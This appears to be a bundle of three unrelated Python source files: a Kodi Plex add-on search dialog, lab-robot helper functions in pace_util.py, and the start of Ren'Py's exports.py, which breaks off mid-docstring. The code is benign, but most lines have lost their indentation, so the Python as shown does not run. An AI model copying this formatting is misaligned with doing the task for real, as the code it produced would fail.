'photoalbum': {'type': 'square'},
'photo': {'type': 'square'},
'actor': {'type': 'circle'},
'director': {'type': 'circle'},
'genre': {'type': 'circle'},
'playlist': {'type': 'square'},
}
SECTION_TYPE_MAP = {
'1': {'thumb': 'script.plexodus/section_type/movie.png'}, # Movie
'2': {'thumb': 'script.plexodus/section_type/show.png'}, # Show
'3': {'thumb': 'script.plexodus/section_type/show.png'}, # Season
'4': {'thumb': 'script.plexodus/section_type/show.png'}, # Episode
'8': {'thumb': 'script.plexodus/section_type/music.png'}, # Artist
'9': {'thumb': 'script.plexodus/section_type/music.png'}, # Album
'10': {'thumb': 'script.plexodus/section_type/music.png'}, # Track
}
def __init__(self, *args, **kwargs):
kodigui.BaseDialog.__init__(self, *args, **kwargs)
windowutils.UtilMixin.__init__(self)
self.parentWindow = kwargs.get('parent_window')
self.sectionID = kwargs.get('section_id')
self.resultsThread = None
self.updateResultsTimeout = 0
self.isActive = True
def onFirstInit(self):
        # Twelve hub rows of four list controls each; their control IDs run in
        # groups of four from HUB_POSTER_00 (2100) through HUB_CIRCLE_47 (2147).
        self.hubControls = tuple(
            {
                'poster': kodigui.ManagedControlList(self, base, 5),
                'square': kodigui.ManagedControlList(self, base + 1, 5),
                'ar16x9': kodigui.ManagedControlList(self, base + 2, 5),
                'circle': kodigui.ManagedControlList(self, base + 3, 5)
            }
            for base in range(self.HUB_POSTER_00, self.HUB_CIRCLE_47 + 1, 4)
        )
self.edit = kodigui.SafeControlEdit(650, 651, self, key_callback=self.updateFromEdit, grab_focus=True)
        self.edit.setCompatibleMode(rpc.Application.GetProperties(properties=["version"])["version"]["major"] < 17)
self.setProperty('search.section', 'all')
self.updateQuery()
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_NAV_BACK, xbmcgui.ACTION_PREVIOUS_MENU):
self.isActive = False
except:
util.ERROR()
kodigui.BaseDialog.onAction(self, action)
def onClick(self, controlID):
if 1000 < controlID < 1037:
self.letterClicked(controlID)
elif controlID in self.SECTION_BUTTONS:
self.sectionClicked(controlID)
elif controlID == 951:
self.deleteClicked()
elif controlID == 952:
self.letterClicked(1037)
elif controlID == 953:
self.clearClicked()
elif 2099 < controlID < 2200:
self.hubItemClicked(controlID)
def onFocus(self, controlID):
if 2099 < controlID < 2200:
self.setProperty('hub.focus', str(controlID - 2099))
def updateFromEdit(self):
self.updateQuery()
def updateQuery(self):
self.updateResults()
def updateResults(self):
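        # Debounce: push the deadline ~1s into the future; a single worker thread
        # (started below if needed) runs the search once input has been idle.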
self.updateResultsTimeout = time.time() + 1
        if not self.resultsThread or not self.resultsThread.is_alive():
self.resultsThread = threading.Thread(target=self._updateResults, name='search.update')
self.resultsThread.start()
def _updateResults(self):
while time.time() < self.updateResultsTimeout and not util.MONITOR.waitForAbort(0.1):
pass
self._reallyUpdateResults()
def _reallyUpdateResults(self):
query = self.edit.getText()
if query:
with self.propertyContext('searching'):
hubs = plexapp.SERVERMANAGER.selectedServer.hubs(count=10, search_query=query, section=self.sectionID)
self.showHubs(hubs)
else:
self.clearHubs()
def sectionClicked(self, controlID):
section = self.SECTION_BUTTONS[controlID]
old = self.getProperty('search.section')
self.setProperty('search.section', section)
if old != section:
self.updateResults()
def letterClicked(self, controlID):
letter = self.LETTERS[controlID - 1001]
self.edit.append(letter)
self.updateQuery()
def deleteClicked(self):
self.edit.delete()
self.updateQuery()
def clearClicked(self):
self.edit.setText('')
self.updateQuery()
def hubItemClicked(self, hubControlID):
for controls in self.hubControls:
for control in controls.values():
if control.controlID == hubControlID:
break
else:
continue
break
else:
return
mli = control.getSelectedItem()
if not mli:
return
hubItem = mli.dataSource
if hubItem.TYPE == 'playlist' and not hubItem.exists(): # Workaround for server bug
util.messageDialog('No Access', 'Playlist not accessible by this user.')
util.DEBUG_LOG('Search: Playlist does not exist - probably wrong user')
return
self.doClose()
try:
command = opener.open(hubItem)
if not hubItem.exists():
control.removeManagedItem(mli)
self.processCommand(command)
finally:
if not self.exitCommand:
self.show()
else:
self.isActive = False
def createListItem(self, hubItem):
if hubItem.TYPE in ('Genre', 'Director', 'Role'):
if hubItem.TYPE == 'Genre':
thumb = (self.SECTION_TYPE_MAP.get(hubItem.librarySectionType) or {}).get('thumb', '')
mli = kodigui.ManagedListItem(hubItem.tag, hubItem.reasonTitle, thumbnailImage=thumb, data_source=hubItem)
mli.setProperty('thumb.fallback', thumb)
else:
mli = kodigui.ManagedListItem(
hubItem.tag, hubItem.reasonTitle, thumbnailImage=hubItem.get('thumb').asTranscodedImageURL(256, 256), data_source=hubItem
)
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/role.png')
else:
if hubItem.TYPE == 'playlist':
mli = kodigui.ManagedListItem(hubItem.tag, thumbnailImage=hubItem.get('composite').asTranscodedImageURL(256, 256), data_source=hubItem)
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/{0}.png'.format(hubItem.playlistType == 'audio' and 'music' or 'movie'))
elif hubItem.TYPE == 'photodirectory':
mli = kodigui.ManagedListItem(hubItem.title, thumbnailImage=hubItem.get('composite').asTranscodedImageURL(256, 256), data_source=hubItem)
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/photo.png')
else:
mli = kodigui.ManagedListItem(hubItem.title, thumbnailImage=hubItem.get('thumb').asTranscodedImageURL(256, 256), data_source=hubItem)
if hubItem.TYPE in ('movie', 'clip'):
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/movie.png')
elif hubItem.TYPE in ('artist', 'album', 'track'):
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/music.png')
elif hubItem.TYPE in ('show', 'season', 'episode'):
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/show.png')
elif hubItem.TYPE == 'photo':
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/photo.png')
return mli
def showHubs(self, hubs):
self.clearHubs()
self.opaqueBackground(on=False)
allowed = None
if self.getProperty('search.section') == 'movie':
allowed = ('movie',)
elif self.getProperty('search.section') == 'show':
allowed = ('show', 'season', 'episode')
elif self.getProperty('search.section') == 'artist':
allowed = ('artist', 'album', 'track')
elif self.getProperty('search.section') == 'photo':
allowed = ('photo', 'photodirectory')
controlID = None
i = 0
for h in hubs:
if allowed and h.type not in allowed:
continue
if h.size.asInt() > 0:
self.opaqueBackground()
cid = self.showHub(h, i)
controlID = controlID or cid
i += 1
if controlID:
self.setProperty('no.results', '')
else:
self.setProperty('no.results', '1')
def showHub(self, hub, idx):
util.DEBUG_LOG('Showing search hub: {0} at {1}'.format(hub.type, idx))
info = self.HUBMAP.get(hub.type)
if not info:
util.DEBUG_LOG('Unhandled hub type: {0}'.format(hub.type))
return
itemListControl = self.hubControls[idx][info['type']]
if itemListControl is None:
util.DEBUG_LOG('No control defined')
return
self.setProperty('hub.{0}'.format(itemListControl.controlID), hub.title)
items = []
for hubItem in hub.items:
mli = self.createListItem(hubItem)
items.append(mli)
itemListControl.reset()
itemListControl.addItems(items)
return itemListControl.controlID
def clearHubs(self):
self.opaqueBackground(on=False)
self.setProperty('no.results', '')
for controls in self.hubControls:
for control in controls.values():
if control:
control.reset()
self.setProperty('hub.focus', '')
def opaqueBackground(self, on=True):
self.parentWindow.setProperty('search.dialog.hasresults', on and '1' or '')
def wait(self):
while self.isActive and not util.MONITOR.waitForAbort(0.1):
pass
def dialog(parent_window, section_id=None):
parent_window.setProperty('search.dialog.hasresults', '')
with parent_window.propertyContext('search.dialog'):
try:
w = SearchDialog.open(parent_window=parent_window, section_id=section_id)
w.wait()
command = w.exitCommand or ''
del w
return command
finally:
parent_window.setProperty('search.dialog.hasresults', '')
|
pace_util.py
|
#!python3
import sys, os, time, logging, importlib
from threading import Thread
this_file_dir = os.path.dirname(__file__)
methods_dir = os.path.abspath(os.path.join(this_file_dir, '..', '..', '..'))
dropbox_dir = os.path.dirname(methods_dir)
user_dir = os.path.dirname(dropbox_dir)
global_log_dir = os.path.join(dropbox_dir, 'Monitoring', 'log')
pyham_pkg_path = os.path.join(methods_dir, 'perma_oem', 'pyhamilton')
reader_mod_path = os.path.join(methods_dir, 'perma_plate_reader', 'platereader')
pump_pkg_path = os.path.join(methods_dir, 'perma_pump', 'auxpump')
shaker_pkg_path = os.path.join(methods_dir, 'perma_shaker', 'auxshaker')
LAYFILE = os.path.join(this_file_dir, 'assets', 'deck.lay')
for imp_path in (pyham_pkg_path, reader_mod_path, pump_pkg_path, shaker_pkg_path):
pkgname = os.path.basename(imp_path)
try:
imported_mod = importlib.import_module(pkgname)
except ModuleNotFoundError:
if imp_path not in sys.path:
sys.path.append(imp_path)
imported_mod = importlib.import_module(pkgname)
print('USING ' + ('SITE-PACKAGES ' if 'site-packages' in os.path.abspath(imported_mod.__file__) else 'LOCAL ') + pkgname)
import pyhamilton
from pyhamilton import (HamiltonInterface, LayoutManager, ResourceType, Plate24, Plate96, Tip96,
INITIALIZE, PICKUP, EJECT, ASPIRATE, DISPENSE, ISWAP_GET, ISWAP_PLACE, HEPA,
WASH96_EMPTY, PICKUP96, EJECT96, ASPIRATE96, DISPENSE96,
oemerr, PositionError)
from platereader.clariostar import ClarioStar, PlateData
from auxpump.pace import OffDeckCulturePumps, LBPumps
from auxshaker.bigbear import Shaker
import send_email
def resource_list_with_prefix(layout_manager, prefix, res_class, num_ress, order_key=None, reverse=False):
def name_from_line(line):
field = LayoutManager.layline_objid(line)
if field:
return field
return LayoutManager.layline_first_field(line)
layline_test = lambda line: LayoutManager.field_starts_with(name_from_line(line), prefix)
res_type = ResourceType(res_class, layline_test, name_from_line)
res_list = [layout_manager.assign_unused_resource(res_type, order_key=order_key, reverse=reverse) for _ in range(num_ress)]
return res_list
def labware_pos_str(labware, idx):
return labware.layout_name() + ', ' + labware.position_id(idx)
def compound_pos_str(pos_tuples):
present_pos_tups = [pt for pt in pos_tuples if pt is not None]
return ';'.join((labware_pos_str(labware, idx) for labware, idx in present_pos_tups))
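# compound_pos_str joins 'layout_name, position_id' pairs with ';', skipping None
# entries; this is the labwarePositions string format the Hamilton commands expect.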
def compound_pos_str_96(labware96):
return ';'.join((labware_pos_str(labware96, idx) for idx in range(96)))
def initialize(ham, asynchronous=False):
    # NB: this flag (and the ones below) was renamed from `async`, which became a
    # reserved keyword in Python 3.7.
    logging.info('initialize: ' + ('a' if asynchronous else '') + 'synchronously initialize the robot')
    cmd = ham.send_command(INITIALIZE)
    if not asynchronous:
        ham.wait_on_response(cmd, raise_first_exception=True)
    return cmd
def hepa_on(ham, speed=15, asynchronous=False, **more_options):
    logging.info('hepa_on: turn on HEPA filter at ' + str(speed) + '% capacity' +
                 ('' if not more_options else ' with extra options ' + str(more_options)))
    cmd = ham.send_command(HEPA, fanSpeed=speed, **more_options)
    if not asynchronous:
        ham.wait_on_response(cmd, raise_first_exception=True)
    return cmd
def wash_empty_refill(ham, asynchronous=False, **more_options):
    logging.info('wash_empty_refill: empty the washer' +
                 ('' if not more_options else ' with extra options ' + str(more_options)))
    cmd = ham.send_command(WASH96_EMPTY, **more_options)
    if not asynchronous:
        ham.wait_on_response(cmd, raise_first_exception=True)
    return cmd
def move_plate(ham, source_plate, target_plate, try_inversions=None):
logging.info('move_plate: Moving plate ' + source_plate.layout_name() + ' to ' + target_plate.layout_name())
src_pos = labware_pos_str(source_plate, 0)
trgt_pos = labware_pos_str(target_plate, 0)
if try_inversions is None:
try_inversions = (0, 1)
for inv in try_inversions:
cid = ham.send_command(ISWAP_GET, plateLabwarePositions=src_pos, gripHeight=6, inverseGrip=inv)
try:
ham.wait_on_response(cid, raise_first_exception=True, timeout=120)
break
except PositionError:
pass
else:
raise IOError
cid = ham.send_command(ISWAP_PLACE, plateLabwarePositions=trgt_pos)
try:
ham.wait_on_response(cid, raise_first_exception=True, timeout=120)
except PositionError:
raise IOError
def lagoon_pos_for_lagoon(lagoon_idx):
return lagoon_plate, lagoon_idx
def clean_tip_pos_for_lagoon(lagoon_idx):
return clean_tip_box, lagoon_idx
def dirty_tip_pos_for_lagoon(lagoon_idx):
return dirty_tip_boxes[lagoon_idx//96], lagoon_idx%96
def offset_equal_spaced_idxs(start_idx, increment):
# a generator that will be used for reader positions
idx = start_idx
while True:
yield idx
idx += increment
def read_plate(ham_int, reader_int, reader_site, plate, protocol_names, plate_id=None, async_task=None, plate_destination=None):
logging.info('read_plate: Running plate protocols ' + ', '.join(protocol_names) +
' on plate ' + plate.layout_name() + ('' if plate_id is None else ' with id ' + plate_id))
reader_int.plate_out(block=True)
move_plate(ham_int, plate, reader_site)
if async_task:
t = run_async(async_task)
plate_datas = reader_int.run_protocols(protocol_names, plate_id_1=plate_id)
reader_int.plate_out(block=True)
if async_task:
t.join()
if plate_destination is None:
plate_destination = plate
move_plate(ham_int, reader_site, plate_destination)
return plate_datas
def channel_var(pos_tuples):
ch_var = ['0']*16
for i, pos_tup in enumerate(pos_tuples):
if pos_tup is not None:
ch_var[i] = '1'
return ''.join(ch_var)
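# e.g. channel_var([(tips, 0), None, (tips, 2)]) -> '1010000000000000' (hypothetical
# `tips` rack): one flag per pipetting channel, '1' where a position tuple is present.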
def tip_pick_up(ham_int, pos_tuples, **more_options):
logging.info('tip_pick_up: Pick up tips at ' + '; '.join((labware_pos_str(*pt) if pt else '(skip)' for pt in pos_tuples)) +
('' if not more_options else ' with extra options ' + str(more_options)))
num_channels = len(pos_tuples)
if num_channels > 8:
raise ValueError('Can only pick up 8 tips at a time')
ch_patt = channel_var(pos_tuples)
labware_poss = compound_pos_str(pos_tuples)
ham_int.wait_on_response(ham_int.send_command(PICKUP,
labwarePositions=labware_poss,
channelVariable=ch_patt,
**more_options), raise_first_exception=True)
def tip_eject(ham_int, pos_tuples=None, **more_options):
if pos_tuples is None:
logging.info('tip_eject: Eject tips to default waste' + ('' if not more_options else ' with extra options ' + str(more_options)))
more_options['useDefaultWaste'] = 1
dummy = Tip96('')
pos_tuples = [(dummy, 0)] * 8
else:
logging.info('tip_eject: Eject tips to ' + '; '.join((labware_pos_str(*pt) if pt else '(skip)' for pt in pos_tuples)) +
('' if not more_options else ' with extra options ' + str(more_options)))
num_channels = len(pos_tuples)
if num_channels > 8:
raise ValueError('Can only eject up to 8 tips')
ch_patt = channel_var(pos_tuples)
labware_poss = compound_pos_str(pos_tuples)
ham_int.wait_on_response(ham_int.send_command(EJECT,
labwarePositions=labware_poss,
channelVariable=ch_patt,
**more_options), raise_first_exception=True)
default_liq_class = 'HighVolumeFilter_Water_DispenseJet_Empty_with_transport_vol'
def assert_parallel_nones(list1, list2):
if not (len(list1) == len(list2) and all([(i1 is None) == (i2 is None) for i1, i2 in zip(list1, list2)])):
raise ValueError('Lists must have parallel None entries')
def aspirate(ham_int, pos_tuples, vols, **more_options):
assert_parallel_nones(pos_tuples, vols)
logging.info('aspirate: Aspirate volumes ' + str(vols) + ' from positions [' +
'; '.join((labware_pos_str(*pt) if pt else '(skip)' for pt in pos_tuples)) +
(']' if not more_options else '] with extra options ' + str(more_options)))
if len(pos_tuples) > 8:
raise ValueError('Can only aspirate with 8 channels at a time')
if 'liquidClass' not in more_options:
more_options.update({'liquidClass':default_liq_class})
ham_int.wait_on_response(ham_int.send_command(ASPIRATE,
channelVariable=channel_var(pos_tuples),
labwarePositions=compound_pos_str(pos_tuples),
volumes=[v for v in vols if v is not None],
**more_options), raise_first_exception=True)
def dispense(ham_int, pos_tuples, vols, **more_options):
assert_parallel_nones(pos_tuples, vols)
logging.info('dispense: Dispense volumes ' + str(vols) + ' into positions [' +
'; '.join((labware_pos_str(*pt) if pt else '(skip)' for pt in pos_tuples)) +
(']' if not more_options else '] with extra options ' + str(more_options)))
if len(pos_tuples) > 8:
        raise ValueError('Can only dispense with 8 channels at a time')
if 'liquidClass' not in more_options:
more_options.update({'liquidClass':default_liq_class})
ham_int.wait_on_response(ham_int.send_command(DISPENSE,
channelVariable=channel_var(pos_tuples),
labwarePositions=compound_pos_str(pos_tuples),
volumes=[v for v in vols if v is not None],
**more_options), raise_first_exception=True)
def tip_pick_up_96(ham_int, tip96, **more_options):
logging.info('tip_pick_up_96: Pick up tips at ' + tip96.layout_name() +
('' if not more_options else ' with extra options ' + str(more_options)))
labware_poss = compound_pos_str_96(tip96)
ham_int.wait_on_response(ham_int.send_command(PICKUP96,
labwarePositions=labware_poss,
**more_options), raise_first_exception=True)
def tip_eject_96(ham_int, tip96=None, **more_options):
logging.info('tip_eject_96: Eject tips to ' + (tip96.layout_name() if tip96 else 'default waste') +
('' if not more_options else ' with extra options ' + str(more_options)))
if tip96 is None:
labware_poss = ''
more_options.update({'tipEjectToKnownPosition':2}) # 2 is default waste
else:
labware_poss = compound_pos_str_96(tip96)
ham_int.wait_on_response(ham_int.send_command(EJECT96,
labwarePositions=labware_poss,
**more_options), raise_first_exception=True)
def aspirate_96(ham_int, plate96, vol, **more_options):
logging.info('aspirate_96: Aspirate volume ' + str(vol) + ' from ' + plate96.layout_name() +
('' if not more_options else ' with extra options ' + str(more_options)))
if 'liquidClass' not in more_options:
more_options.update({'liquidClass':default_liq_class})
ham_int.wait_on_response(ham_int.send_command(ASPIRATE96,
labwarePositions=compound_pos_str_96(plate96),
aspirateVolume=vol,
**more_options), raise_first_exception=True)
def dispense_96(ham_int, plate96, vol, **more_options):
logging.info('dispense_96: Dispense volume ' + str(vol) + ' into ' + plate96.layout_name() +
('' if not more_options else ' with extra options ' + str(more_options)))
if 'liquidClass' not in more_options:
more_options.update({'liquidClass':default_liq_class})
ham_int.wait_on_response(ham_int.send_command(DISPENSE96,
labwarePositions=compound_pos_str_96(plate96),
dispenseVolume=vol,
**more_options), raise_first_exception=True)
def add_robot_level_log(logger_name=None):
logger = logging.getLogger(logger_name) # root logger if None
logger.setLevel(logging.DEBUG)
with open(os.path.join(user_dir, '.roboid')) as roboid_f:
robot_id = roboid_f.read()
robot_log_dir = os.path.join(global_log_dir, robot_id, robot_id + '.log')
hdlr = logging.FileHandler(robot_log_dir)
formatter = logging.Formatter('[%(asctime)s] %(name)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
class StderrLogger:
def __init__(self, level):
self.level = level
self.stderr = sys.stderr
def write(self, message):
self.stderr.write(message)
if message.strip():
self.level(message.replace('\n', ''))
def add_stderr_logging(logger_name=None):
logger = logging.getLogger(logger_name) # root logger if None
sys.stderr = StderrLogger(logger.error)
fileflag_dir = os.path.abspath('.')
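# Walk up from the current working directory to the enclosing 'std-96-pace'
# directory; the loop below assumes such a directory exists above the CWD.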
while fileflag_dir and os.path.basename(fileflag_dir).lower() != 'std-96-pace':
fileflag_dir = os.path.dirname(fileflag_dir)
fileflag_dir = os.path.join(fileflag_dir, 'method_local', 'flags')
def set_fileflag(flag_name):
assert_fileflag_harmless(flag_name)
flag_loc = os.path.join(fileflag_dir, flag_name)
if not os.path.isdir(fileflag_dir):
if os.path.exists(fileflag_dir):
raise IOError('method-local non-directory item named "flags" already exists')
os.mkdir(fileflag_dir)
if not fileflag(flag_name):
with open(flag_loc, 'w+') as f:
f.write('')
def clear_fileflag(flag_name):
assert_fileflag_harmless(flag_name)
flag_loc = os.path.join(fileflag_dir, flag_name)
try:
os.remove(flag_loc)
except FileNotFoundError:
pass
def fileflag(flag_name):
flag_loc = os.path.join(fileflag_dir, flag_name)
return os.path.isfile(flag_loc)
def assert_fileflag_harmless(flag_name):
if not fileflag(flag_name):
return
flag_loc = os.path.join(fileflag_dir, flag_name)
if os.path.getsize(flag_loc) != 0:
raise IOError('Fileflag refers to a non-empty file!')
def run_async(funcs):
def go():
try:
iter(funcs)
except TypeError:
funcs()
return
for func in funcs:
func()
func_thread = Thread(target=go, daemon=True)
func_thread.start()
return func_thread
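# e.g. run_async(step_a) runs one callable on a background daemon thread, while
# run_async([step_a, step_b]) runs them sequentially on a single worker thread
# (step_a/step_b are hypothetical callables).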
def yield_in_chunks(sliceable, n):
sliceable = list(sliceable)
start_pos = 0
end_pos = n
while start_pos < len(sliceable):
yield sliceable[start_pos:end_pos]
start_pos, end_pos = end_pos, end_pos + n
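# e.g. list(yield_in_chunks(range(5), 2)) -> [[0, 1], [2, 3], [4]]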
def log_banner(banner_text):
l = len(banner_text)
margin = 5
width = l + 2*margin + 2
return ['#'*width,
'#' + ' '*(width - 2) + '#',
'#' + ' '*margin + banner_text + ' '*margin + '#',
'#' + ' '*(width - 2) + '#',
'#'*width]
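# e.g. log_banner('done') returns five strings forming a 16-character-wide box of
# '#' with the text centered, meant to be logged line by line.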
|
exports.py
|
# Copyright 2004-2019 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains functions that are exported to the script namespace.
# Functions defined in this file can be updated by the user to change
# their behavior, while functions imported in are probably best left
# alone as part of the api.
from __future__ import print_function
# Remember the real file.
_file = file
import re
import renpy.display
import renpy.audio
from renpy.pyanalysis import const, pure, not_const
def renpy_pure(fn):
"""
Marks renpy.`fn` as a pure function.
"""
name = fn
if not isinstance(name, basestring):
name = fn.__name__
pure("renpy." + name)
return fn
import pygame_sdl2
from renpy.text.extras import ParameterizedText, filter_text_tags
from renpy.text.font import register_sfont, register_mudgefont, register_bmfont
from renpy.text.text import language_tailor, BASELINE
from renpy.display.behavior import Keymap
from renpy.display.behavior import run, run as run_action, run_unhovered, run_periodic
from renpy.display.behavior import map_event, queue_event, clear_keymap_cache
from renpy.display.behavior import is_selected, is_sensitive
from renpy.display.minigame import Minigame
from renpy.display.screen import define_screen, show_screen, hide_screen, use_screen, current_screen
from renpy.display.screen import has_screen, get_screen, get_widget, ScreenProfile as profile_screen
from renpy.display.screen import get_widget_properties
from renpy.display.focus import focus_coordinates
from renpy.display.predict import screen as predict_screen
from renpy.display.image import image_exists, image_exists as has_image, list_images
from renpy.display.image import get_available_image_tags, get_available_image_attributes, check_image_attributes, get_ordered_image_attributes
from renpy.display.image import get_registered_image
from renpy.display.im import load_surface, load_image
from renpy.curry import curry, partial
from renpy.display.video import movie_start_fullscreen, movie_start_displayable, movie_stop
from renpy.loadsave import load, save, list_saved_games, can_load, rename_save, copy_save, unlink_save, scan_saved_game
from renpy.loadsave import list_slots, newest_slot, slot_mtime, slot_json, slot_screenshot, force_autosave
from renpy.python import py_eval as eval
from renpy.python import rng as random
from renpy.atl import atl_warper
from renpy.easy import predict, displayable, split_properties
from renpy.parser import unelide_filename, get_parse_errors
from renpy.translation import change_language, known_languages
from renpy.translation.generation import generic_filter as transform_text
from renpy.persistent import register_persistent
from renpy.character import show_display_say, predict_show_display_say, display_say
import renpy.audio.sound as sound
import renpy.audio.music as music
from renpy.statements import register as register_statement
from renpy.text.extras import check_text_tags
from renpy.memory import profile_memory, diff_memory, profile_rollback
from renpy.text.textsupport import TAG as TEXT_TAG, TEXT as TEXT_TEXT, PARAGRAPH as TEXT_PARAGRAPH, DISPLAYABLE as TEXT_DISPLAYABLE
from renpy.execution import not_infinite_loop
from renpy.sl2.slparser import CustomParser as register_sl_statement, register_sl_displayable
from renpy.ast import eval_who
from renpy.loader import add_python_directory
from renpy.lint import try_compile, try_eval
renpy_pure("ParameterizedText")
renpy_pure("Keymap")
renpy_pure("has_screen")
renpy_pure("image_exists")
renpy_pure("curry")
renpy_pure("partial")
renpy_pure("unelide_filename")
renpy_pure("known_languages")
renpy_pure("check_text_tags")
renpy_pure("filter_text_tags")
import time
import sys
import threading
import fnmatch
def public_api():
"""
:undocumented:
This does nothing, except to make warnings about unused imports go away.
"""
ParameterizedText, filter_text_tags
register_sfont, register_mudgefont, register_bmfont
Keymap
run, run_action, run_unhovered, run_periodic, map_event
Minigame
curry, partial
play
movie_start_fullscreen, movie_start_displayable, movie_stop
load, save, list_saved_games, can_load, rename_save, copy_save, unlink_save, scan_saved_game
list_slots, newest_slot, slot_mtime, slot_json, slot_screenshot, force_autosave
eval
random
atl_warper
show_display_say, predict_show_display_say, display_say
sound
music
time
define_screen, show_screen, hide_screen, use_screen, has_screen
current_screen, get_screen, get_widget, profile_screen, get_widget_properties
focus_coordinates
predict, predict_screen
displayable, split_properties
unelide_filename, get_parse_errors
change_language, known_languages
transform_text
language_tailor
register_persistent
register_statement
check_text_tags
map_event, queue_event, clear_keymap_cache
const, pure, not_const
image_exists, has_image, list_images
get_available_image_tags, get_available_image_attributes, check_image_attributes, get_ordered_image_attributes
get_registered_image
load_image, load_surface
profile_memory, diff_memory, profile_rollback
TEXT_TAG
TEXT_TEXT
TEXT_PARAGRAPH
TEXT_DISPLAYABLE
not_infinite_loop
register_sl_statement, register_sl_displayable
eval_who
is_selected, is_sensitive
add_python_directory
try_compile, try_eval
del public_api
def roll_forward_info():
"""
:doc: rollback
When in rollback, returns the data that was supplied to :func:`renpy.checkpoint`
the last time this statement executed. Outside of rollback, returns None.
"""
if not renpy.game.context().rollback:
return None
return renpy.game.log.forward_info()
def roll_forward_core(value=None):
"""
:undocumented:
To cause a roll_forward to occur, return the value of this function
from an event handler.
"""
if value is None:
value = roll_forward_info()
if value is None:
return
renpy.game.interface.suppress_transition = True
renpy.game.after_rollback = True
renpy.game.log.rolled_forward = True
return value
def in_rollback():
"""
:doc: rollback
Returns true if the game has been rolled back.
"""
return renpy.game.log.in_rollback() or renpy.game.after_rollback
def can_rollback():
"""
:doc: rollback
Returns true if we can rollback.
"""
if not renpy.config.rollback_enabled:
return False
return renpy.game.log.can_rollback()
def in_fixed_rollback():
"""
:doc: blockrollback
Returns true if rollback is currently occurring and the current
context is before an executed renpy.fix_rollback() statement.
"""
return renpy.game.log.in_fixed_rollback()
def checkpoint(data=None, keep_rollback=None):
"""
:doc: rollback
:args: (data=None)
Makes the current statement a checkpoint that the user can rollback to. Once
this function has been called, there should be no more interaction with the
user in the current statement.
This will also clear the current screenshot used by saved games.
`data`
This data is returned by :func:`renpy.roll_forward_info` when the
game is being rolled back.
"""
if keep_rollback is None:
keep_rollback = renpy.config.keep_rollback_data
renpy.game.log.checkpoint(data, keep_rollback=keep_rollback, hard=renpy.store._rollback)
if renpy.store._rollback and renpy.config.auto_clear_screenshot:
renpy.game.interface.clear_screenshot = True
def block_rollback(purge=False):
"""
:doc: blockrollback
:args: ()
Prevents the game from rolling back to before the current
statement.
"""
renpy.game.log.block(purge=purge)
def suspend_rollback(flag):
"""
:doc: rollback
:args: (flag)
Rollback will skip sections of the game where rollback has been
suspended.
`flag`:
When `flag` is true, rollback is suspended. When false,
rollback is resumed.
"""
renpy.game.log.suspend_checkpointing(flag)
def fix_rollback():
"""
:doc: blockrollback
Prevents the user from changing decisions made before the current
statement.
"""
renpy.game.log.fix_rollback()
def retain_after_load():
"""
:doc: retain_after_load
Causes data modified between the current statement and the statement
containing the next checkpoint to be retained when a load occurs.
"""
renpy.game.log.retain_after_load()
scene_lists = renpy.display.core.scene_lists
def count_displayables_in_layer(layer):
"""
Returns how many displayables are in the supplied layer.
"""
sls = scene_lists()
return len(sls.layers[layer])
def image(name, d):
"""
:doc: se_images
Defines an image. This function is the Python equivalent of the
image statement.
`name`
The name of the image to display, a string.
`d`
The displayable to associate with that image name.
This function may only be run from inside an init block. It is an
error to run this function once the game has started.
"""
if d is None:
raise Exception("Images may not be declared to be None.")
if not renpy.game.context().init_phase:
raise Exception("Images may only be declared inside init blocks.")
if not isinstance(name, tuple):
name = tuple(name.split())
d = renpy.easy.displayable(d)
renpy.display.image.register_image(name, d)
def copy_images(old, new):
"""
:doc: image_func
Copies images beginning with one prefix to images beginning with
another. For example::
renpy.copy_images("eileen", "eileen2")
will create an image beginning with "eileen2" for every image beginning
with "eileen". If "eileen happy" exists, "eileen2 happy" will be
created.
`old`
A space-separated string giving the components of the old image
name.
`new`
A space-separated string giving the components of the new image
name.
"""
if not isinstance(old, tuple):
old = tuple(old.split())
if not isinstance(new, tuple):
new = tuple(new.split())
lenold = len(old)
for k, v in renpy.display.image.images.items():
if len(k) < lenold:
continue
if k[:lenold] == old:
renpy.display.image.register_image(new + k[lenold:], v)
def default_layer(layer, tag, expression=False):
"""
:undocumented:
If layer is not None, returns it. Otherwise, interprets `tag` as a name
or tag, then looks up what the default layer for that tag is, and returns
the result.
"""
if layer is not None:
return layer
if expression:
return 'master'
if isinstance(tag, tuple):
tag = tag[0]
elif " " in tag:
tag = tag.split()[0]
return renpy.config.tag_layer.get(tag, renpy.config.default_tag_layer)
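# For example, default_layer(None, "eileen happy") reduces the name to its tag
# "eileen" and returns renpy.config.tag_layer.get("eileen", renpy.config.default_tag_layer).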
def can_show(name, layer=None, tag=None):
"""
:doc: image_func
Determines if `name` can be used to show an image. This interprets `name`
as a tag and attributes. This is combined with the attributes of the
currently-showing image with `tag` on `layer` to try to determine a unique image
    to show. If a unique image can be shown, returns the name of that image as
a tuple. Otherwise, returns None.
`tag`
The image tag to get attributes from. If not given, defaults to the first
component of `name`.
`layer`
